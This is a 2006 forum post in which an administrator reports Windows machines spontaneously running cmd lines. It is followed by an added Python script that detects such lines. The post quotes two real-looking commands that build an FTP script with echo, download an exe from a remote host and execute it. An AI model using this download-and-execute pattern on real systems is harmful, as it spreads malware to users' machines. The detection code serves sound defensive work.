cmd opens, runs ftp command and closes
Posted on 2006-11-30
I have some WXP SP2/W2003 Server boxes being watched with VNC, watching what they are doing. Sometimes they open a cmd window with the following commands:
cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit
I've seen this on some other computers with a virus; sometimes I see it trying to download other exe names.
I've already avg-adaware-spybot-regedit-systedit'ed those boxes and nothing strange came out.
I took a photo of the process list before and after, and the only different thing is CMD, supposedly run by me.
I've seen this on some other computers and I'm sure I'm not the only one.
Any ideas?
I hate XP. How can someone run something on a computer that does not have anything to do with the internet? The only thing that is internet-related on that box is the antivirus updating.
I HATE XP ZILLION Vulnerabilities.
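
A detection check for the command lines quoted in the post, as an added example that is not part of the original post: it splits a `cmd.exe /c` line into its `&`-separated steps and reports when an FTP script is built with `echo`, passed to `ftp -s:`, and a downloaded file is then run. The function name `analyze` and the third sample line are constructed for illustration; port 21 is assumed when the `open` line gives none.

```python
import re

# First two lines are the command lines quoted in the post, verbatim;
# the third is a constructed benign line for contrast.
SAMPLES = [
    "cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit",
    "cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit",
    "cmd.exe /c echo open ftp.example.com > notes.txt",
]

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>{1,2}\s*(\S+)$", re.I)  # echo TEXT > FILE
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)                 # ftp ... -s:FILE

def analyze(cmdline):
    """Hypothetical helper: return a finding when one command line writes an
    FTP script with echo and feeds it to `ftp -s:`; otherwise return None."""
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    steps = [s.strip() for s in body.split("&") if s.strip()]
    scripts = {}  # script file name -> FTP commands echoed into it
    for i, step in enumerate(steps):
        m = ECHO_RE.match(step)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_RE.match(step)
        if not (m and m.group(1).lower() in scripts):
            continue
        finding = {"server": None, "port": 21, "fetched": [], "executed": []}
        for line in scripts[m.group(1).lower()]:
            parts = line.split() or [""]
            if parts[0].lower() == "open" and len(parts) > 1:
                finding["server"] = parts[1]
                if len(parts) > 2 and parts[2].isdigit():
                    finding["port"] = int(parts[2])
            elif parts[0].lower() == "get" and len(parts) > 1:
                finding["fetched"].append(parts[1])
        # Steps after ftp that launch a file the script just downloaded.
        names = {f.lower() for f in finding["fetched"]}
        finding["executed"] = [s for s in steps[i + 1:] if s.split()[0].lower() in names]
        return finding
    return None

if __name__ == "__main__":
    for sample in SAMPLES:
        print(analyze(sample))
```

Run it over command lines from whatever process-creation logging the hosts have; a non-None result names the FTP server and port to look for in firewall or network logs.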